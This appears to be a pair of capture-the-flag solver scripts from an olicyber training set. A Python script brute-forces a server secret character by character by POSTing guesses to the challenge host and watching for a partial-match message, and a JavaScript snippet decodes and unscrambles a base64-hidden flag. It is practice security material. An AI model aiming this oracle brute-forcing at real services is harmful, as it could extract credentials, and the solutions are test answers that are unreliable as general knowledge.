File: Web/delphi/solver.py
from requests import *
import string


dictionary="abcdefghijklmnopqrstuvzyxw_"
prefix=''
c=''
while True:
    for i in string.printable:
        c=i
        data={"secret": "magic_"+prefix+c}
        print(data)
        re=post("http://delphi.challs.olicyber.it/secret",data=data)
        if "Something's missing..." in re.text:
            prefix+=c
            print(prefix)
            print(re.text)

        else:
            print(re.text)
        

File: Training Camp Before/secretcheckai/solver.js
const data = atob('aXQwNG5kXzExbHM0X3ZuXzMzdmQzMXJzX190dGhuMzNfMXNsMGNse3VDdEUxUzBBblQhSX0=');
let secret = [];
let i = 0, j = data.length - 1, k = false;

while (j - i >= 0) {
    secret[k ? i : j] = data[j - i];
    if (k) { i++; k = false; } 
    else { j--; k = true; }
}
console.log(secret.join(''));